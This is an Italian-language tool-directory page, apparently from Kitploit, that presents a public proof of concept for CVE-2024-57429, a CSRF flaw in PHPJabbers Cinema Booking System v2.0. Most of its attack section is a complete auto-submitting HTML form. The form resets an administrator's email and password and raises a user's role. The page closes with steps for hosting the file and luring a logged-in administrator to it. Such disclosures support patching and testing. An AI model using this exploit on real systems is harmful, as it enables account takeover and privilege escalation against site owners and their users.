Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-57429 — CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 è vulnerabile a CSRF, consentendo agli aggressori di aumentare i privilegi falsificando richieste per conto di un amministratore. | Kitploit
Strumenti/GitHubGitHub/ahrixia/cve-2024-57429
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 è vulnerabile a CSRF, consentendo agli aggressori di aumentare i privilegi falsificando richieste per conto di un amministratore.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-57429

Una vulnerabilità di cross-site request forgery (CSRF) nella funzione pjActionUpdate di PHPJabbers Cinema Booking System v2.0 consente ad attaccanti remoti di elevare i privilegi ingannando un amministratore autenticato a inviare una richiesta non autorizzata.

Impatto:

Lo sfruttamento di questa vulnerabilità CSRF può portare ad azioni non autorizzate, come:

  • Modificare la password dell'amministratore, bloccandolo effettivamente.
  • Elevare i privilegi dell'attaccante a amministratore aggiornando il loro ruolo utente.

Exploit - Prova di concetto (POC)

Cross-Site Request Forgery (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. Salva il codice sopra come poc.html
  2. Ospita il file su un server e inganna l'amministratore facendolo accedere mentre è autenticato nell'applicazione.
  3. L'account dell'amministratore verrà aggiornato con i dettagli dell'attaccante e la nuova password.
Scarica lo strumento